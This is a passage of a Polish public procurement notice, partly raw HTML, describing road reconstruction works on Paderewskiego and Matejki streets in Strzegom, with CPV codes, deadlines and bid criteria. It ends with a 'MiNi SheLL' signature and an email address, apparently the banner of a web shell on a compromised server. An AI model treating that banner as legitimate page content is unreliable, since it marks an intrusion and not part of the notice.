- chodników z kostki betonowej,
- wyspy wyniesionej na skrzyżowaniu ul. Paderewskiego z ul. Bankową, 
- krawężników granitowych,
- regulacji wysokościowej wszystkich urządzeń obcych do nowoprojektowanej nawierzchni wraz 
z wymianą skrzynek, obudów i zaworów, 
- wykonanie zabudowy okienek piwnicznych, 
- kanalizacji deszczowej,
- przebudowa istniejącego oświetlenia ulicznego,
-wprowadzenie docelowej organizacji ruchu zgodnie z zatwierdzonym projektem przez Starostę Świdnickiego - zatwierdzenie z dnia 5 września 2016 r. znak: KD.7121.2.156.2016.2,
- wykonawca robót na 7 dni przed dniem wprowadzenia organizacji ruchu musi powiadomić 
o tym fakcie Starostwo Powiatowe w Świdnicy.
- wymagane jest prowadzenie robót zgodnie z  Decyzją Nr 1128/2016 z dnia 8 września 2016 roku znak:WB.6740.1043.2016.3 o pozwoleniu na budowę wydaną przez Starostę Świdnickiego.
- wykonanie nowego oznakowania pionowego i poziomego wg zatwierdzonego przez  
  Starostwo Powiatowe w Świdnicy projektu oznakowania stałego.
- materiały z rozbiórki zjazdów, chodników oraz krawężników należy przekazać Zamawiającemu 
i przewieźć w miejsce wskazane do 2 km.

2.1.2. ZADANIE 2 obejmuje likwidację kolizji z siecią telekomunikacyjną oraz montaż koszy na śmieci oraz pojemników na psie odchody na ul. Paderewskiego w Strzegomiu- zakres robót nie objęty dofinansowaniem. 

Zakres robót obejmuje między innymi wykonanie:
- przesunięcie studni kablowych przy przebudowie, studnia SK-1,
- montaż koszy na śmieci oraz pojemników na psie odchody,
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45110000-1, 45233000-9,
                    45233140-2,
                    45233290-8,
                    45231400-9,
                    45316110-9,
                    45231000-5,
                    32412100-5,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/10/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>PRZEBUDOWA UL. MATEJKI W STRZEGOMIU<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2.2. CZĘŚĆ II: PRZEBUDOWA UL. MATEJKI W STRZEGOMIU

2.2.1. ZADANIE 1 obejmuje przebudowę ul. Matejki w Strzegomiu od skrzyżowania 
z ul. Kościuszki do skrzyżowania z ul. Paderewskiego - zakres robót w pasie drogowym objęty jest dofinansowaniem w ramach programu wieloletniego pod nazwą ,,PROGRAM ROZWOJU GMINNEJ I POWIATOWEJ INFRASTRUKTURY DROGOWEJ NA LATA 2016-2019.
 
Zakres robót obejmuje między innymi wykonanie:
-  robót rozbiórkowych i demontażowych,
-  korytowania, profilowania i zagęszczania podłoża, podbudowy,
- nowej nawierzchni jezdni z betonu asfaltowego,
- ścieku przykrawężnikowego z kostki granitowej,
- zjazdów z kostki granitowej,
- ścieżki rowerowej z betonu asfaltowego,
- chodników z kostki betonowej,
- krawężników granitowych,
- regulacji wysokościowej wszystkich urządzeń obcych do nowoprojektowanej nawierzchni wraz 
z wymianą skrzynek, obudów i zaworów, 
- wykonanie zabudowy okienek piwnicznych, 
- kanalizacji deszczowej,
- budowy oświetlenia ulicznego,
-wprowadzenie docelowej organizacji ruchu zgodnie z zatwierdzonym projektem przez Starostę Świdnickiego - zatwierdzenie z dnia 5 września 2016 r. znak: KD.7121.2.156.2016.2, -wykonawca robót na 7 dni przed dniem wprowadzenia organizacji ruchu musi powiadomić o tym fakcie Starostwo Powiatowe w Świdnicy,
-wymagane jest prowadzenie robót zgodnie z  Decyzją Nr 1129/2016 z dnia 8 września 2016 roku znak:WB.6740.1044.2016.3 o pozwoleniu na budowę wydaną przez Starostę Świdnickiego,
- wykonanie nowego oznakowania pionowego i poziomego wg zatwierdzonego przez  
  Starostwo Powiatowe w Świdnicy projektu oznakowania stałego.
- materiały z rozbiórki zjazdów oraz chodników należy przekazać Zamawiającemu i przewieźć 
w miejsce wskazane do 2 km.

2.2.2. ZADANIE 2 obejmuje likwidację kolizji z siecią telekomunikacyjną na ul. Matejki 
w Strzegomiu - zakres robót nie objęty dofinansowaniem. 

Zakres robót obejmuje między innymi wykonanie:
- budowa kanalizacji,
- budowa studni kablowych,
- przełączenie kabla miedzianego,
- zabezpieczenie kanalizacji.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45110000-1, 45233000-9,
                    45233140-2,
                    45233290-8,
                    45231400-9,
                    45316110-9,
                    45231000-5,
                    32412100-5,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com